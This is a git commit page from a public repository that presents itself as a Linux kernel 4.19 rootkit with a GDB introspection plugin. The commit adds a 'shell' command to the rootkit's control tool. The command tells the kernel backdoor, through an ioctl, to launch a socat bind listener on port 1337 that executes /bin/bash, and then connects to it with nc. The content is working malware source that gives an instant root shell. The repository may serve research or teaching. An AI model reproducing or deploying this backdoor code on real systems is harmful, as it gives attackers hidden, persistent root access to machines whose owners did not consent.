linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 997e825167419bcf5ebffe7f34d1110f2fd50132
parent 38b7b71a3508188084ffdf34a0c57f638955f5f4
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 12:08:30 +0100

adds instant root shell command

Diffstat:

Msrc/rkctl/rkctl.c | 23+++++++++++++++++++++++


Msrc/rkctl/rkctl.h | 1+


2 files changed, 24 insertions(+), 0 deletions(-)

diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -52,6 +52,10 @@ parse_input(int argc, char **argv)
         return (cmd_t){ handle_backdoor, (void *)argv[2] };
     }
 
+    if (ARGVCMP(1, "shell")) {
+        return (cmd_t){ handle_shellbd, NULL };
+    }
+
     if (ARGVCMP(1, "backdoor-use-tty")) {
         ASSERT_ARGC(2, "backdoor-use-tty <0 | 1>");
         // TODO: return backdoor-use-tty handle
@@ -85,6 +89,25 @@ handle_backdoor(void *arg)
 }
 
 int
+handle_shellbd(void *arg)
+{
+    const char *socat_cmd = "socat tcp4-listen:1337,reuseaddr,fork"
+        " exec:/bin/bash,pty,stderr,setsid";
+
+    int ret = issue_ioctl(G7_BACKDOOR, socat_cmd);
+
+    char *argv[] = {
+        "nc",
+        "127.0.0.1",
+        "1337",
+        NULL
+    };
+
+    execve(argv[0], argv, NULL);
+    return ret;
+}
+
+int
 handle_togglebd(void *arg)
 {
 }
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -23,6 +23,7 @@ void help();
 int handle_ping(void *);
 int handle_filehide(void *);
 int handle_backdoor(void *);
+int handle_shellbd(void *);
 int handle_togglebd(void *);
 int handle_hidepid(void *);